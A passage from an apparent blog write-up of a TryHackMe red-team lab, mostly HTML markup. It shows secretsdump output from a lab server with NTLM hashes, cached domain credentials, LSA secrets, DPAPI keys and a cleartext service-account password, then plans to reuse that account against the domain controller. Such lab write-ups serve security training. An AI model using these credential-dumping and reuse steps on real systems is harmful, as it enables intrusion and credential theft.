class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> DLL init: proxychains-ng 4.16<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> DLL init: proxychains-ng 4.16<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Impacket<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">v0.11.0<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Copyright<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Fortra<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Strict chain  ...  127.0.0.1:1080  ...  10.200.113.31:445  ...  OK<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Service RemoteRegistry is <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> stopped state<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Starting service RemoteRegistry<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Target system bootKey: 0x90cf5c2fdcffe9d25ff0ed9b3d14a846<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Dumping local SAM hashes <\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">uid:rid:lmhash:nthash<\/span><span style=\"color: #89DDFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Administrator:500:aad3b435b51404eeaad3b435b51404ee:e2c7044e93cf7e4d8697582207d6785c:::<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">THMSetup:1008:aad3b435b51404eeaad3b435b51404ee:d37f688ca5172b5976b714a8b54b40f4:::<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">HelpDesk:1009:aad3b435b51404eeaad3b435b51404ee:f6ca2f672e731b37150f0c5fa8cfafff:::<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">sshd:1010:aad3b435b51404eeaad3b435b51404ee:48c62694fd5bbca286168e2199f9af49:::<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Dumping cached domain logon information <\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">domain\/username:hash<\/span><span style=\"color: #89DDFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">CORP.THERESERVE.LOC\/Administrator:$DCC2$10240#Administrator#b08785ec00370a4f7d02ef8bd9b798ca:<\/span><span style=\"color: #BABED8\"> (2023-04-01 <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:13:47<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">CORP.THERESERVE.LOC\/svcScanning:$DCC2$10240#svcScanning#d53a09b9e4646451ab823c37056a0d6b:<\/span><span style=\"color: #BABED8\"> (2024-02-06 <\/span><span style=\"color: #F78C6C\">22<\/span><span style=\"color: #C3E88D\">:58:50<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Dumping LSA Secrets<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> $MACHINE.ACC <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">CORP\\SERVER1$:aes256-cts-hmac-sha1-96:60db0f5bd8abfee643cae3060ed708e3158426f253e2711f9be068245cee19ac<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">CORP\\SERVER1$:aes128-cts-hmac-sha1-96:3e61a6a2a9f25ada7f7ebd64a3384a9a<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">CORP\\SERVER1$:des-cbc-md5:023dfdfbcd51b6a8<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">CORP\\SERVER1$:plain_password_hex:323da71a677b83100ef8a4555d87c9ed4af979b405f786814bdecc168e16f82b86cf247e0b03bbe01c09b9fa98d5866fe4a09d3fd99a98b4543bdb36fbbe742c05b0e9b4f6795313db4f68c33cc6bc2330a1c4d75311ede155b90f11ebe5ff8409989636083928daf72ecd7f807e47b4eea7741d5ac3c4141ffad6e5663a19a1660a562a0aa72031d25f1229eb4a445016b8a8b7614ed559b78ef9334dcf6dd9442a1ff43d7a3b1a99b4d74906f3b99666a4d277190d06bb76c6905a9fdf03d7a1272903fce0f5c1c7ed7cee1a9332123ffff71fc3d1de00db45845270842b4b33415df5b524e6f0bf1beac6bdf2fb2a<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">CORP\\SERVER1$:aad3b435b51404eeaad3b435b51404ee:ab478e460aa37786571a4d13497c2f47:::<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> DPAPI_SYSTEM <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">dpapi_machinekey:0xb4cfb5032a98c1b279c92264915da1fd3d8b1a0d<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">dpapi_userkey:0x3cddfc2ba786e51edf1c732a21ffa1f3d19aa382<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> NL$KM <\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">0000<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #F78C6C\">8<\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">D2<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">8<\/span><span style=\"color: #C3E88D\">E<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">67<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">54<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">58<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">89<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">B1<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">C9<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">53<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">B9<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">5<\/span><span style=\"color: #C3E88D\">B<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">46<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">A2<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">B3<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">66<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">...gTX...S.[F..f<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">0010<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">D4<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">3<\/span><span style=\"color: #C3E88D\">B<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">95<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">80<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">92<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">7<\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">67<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">78<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">B7<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">1<\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">F9<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2<\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">A5<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">55<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">B7<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">A3<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">.<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #82AAFF\">...<\/span><span style=\"color: #BABED8\">}<\/span><span style=\"color: #FFCB6B\">gx...-.U..<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">0020<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #F78C6C\">61<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">AA<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4<\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">86<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">95<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">85<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">43<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">86<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">E3<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">12<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">9<\/span><span style=\"color: #C3E88D\">E<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">C4<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">91<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">CF<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">9<\/span><span style=\"color: #C3E88D\">A<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">5<\/span><span style=\"color: #C3E88D\">B<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">a.M...C........[<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">0030<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">D8<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">BB<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">AE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">FA<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">D3<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">41<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">E0<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">D8<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">66<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">3<\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">19<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">75<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">A2<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">D1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">B2<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">......A..f=.u...<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">NL$KM:8dd28e67545889b1c953b95b46a2b366d43b9580927d6778b71df92da555b7a361aa4d8695854386e3129ec491cf9a5bd8bb0daefad341e0d8663d1975a2d1b2<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> _SC_SYNC <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">svcBackups@corp.thereserve.loc:q9nzssaFtGHdqUV3Qv6G<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Cleaning up... <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Stopping service RemoteRegistry<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>There are a couple of things from this output that are of most interest to us:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The Administrator&#8217;s NTLM hash<\/li>\n\n\n\n<li>The ClearText password for <code>svcBackups<\/code> account<\/li>\n<\/ul>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09113d4c&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09113d4c\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"77\" data-attachment-id=\"498\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206172945\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206172945.png?fit=1674%2C126&amp;ssl=1\" data-orig-size=\"1674,126\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206172945\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206172945.png?fit=1024%2C77&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206172945.png?resize=1024%2C77&#038;ssl=1\" alt=\"\" class=\"wp-image-498\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206172945.png?resize=1024%2C77&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206172945.png?resize=300%2C23&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206172945.png?resize=768%2C58&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206172945.png?resize=1536%2C116&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206172945.png?w=1674&amp;ssl=1 1674w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091142d9&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091142d9\" class=\"wp-block-image size-full wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"869\" height=\"141\" data-attachment-id=\"499\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206173005\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173005.png?fit=869%2C141&amp;ssl=1\" data-orig-size=\"869,141\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206173005\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173005.png?fit=869%2C141&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173005.png?resize=869%2C141&#038;ssl=1\" alt=\"\" class=\"wp-image-499\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173005.png?w=869&amp;ssl=1 869w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173005.png?resize=300%2C49&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173005.png?resize=768%2C125&amp;ssl=1 768w\" sizes=\"auto, (max-width: 869px) 100vw, 869px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>Performing the same technqiue won\u2019t work on CORPDC machine with the svcScanning account.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091149ee&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091149ee\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"364\" data-attachment-id=\"500\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206173229\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173229.png?fit=1701%2C605&amp;ssl=1\" data-orig-size=\"1701,605\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206173229\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173229.png?fit=1024%2C364&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173229.png?resize=1024%2C364&#038;ssl=1\" alt=\"\" class=\"wp-image-500\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173229.png?resize=1024%2C364&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173229.png?resize=300%2C107&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173229.png?resize=768%2C273&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173229.png?resize=1536%2C546&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173229.png?w=1701&amp;ssl=1 1701w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>To perform the same technique and dump secrets from the CORPDC machine, we will use the <code>svcBackups<\/code> account.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09115095&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09115095\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"430\" data-attachment-id=\"501\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206173631\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173631.png?fit=1692%2C710&amp;ssl=1\" data-orig-size=\"1692,710\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206173631\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173631.png?fit=1024%2C430&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173631.png?resize=1024%2C430&#038;ssl=1\" alt=\"\" class=\"wp-image-501\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173631.png?resize=1024%2C430&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173631.png?resize=300%2C126&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173631.png?resize=768%2C322&amp;ssl=1 768w, 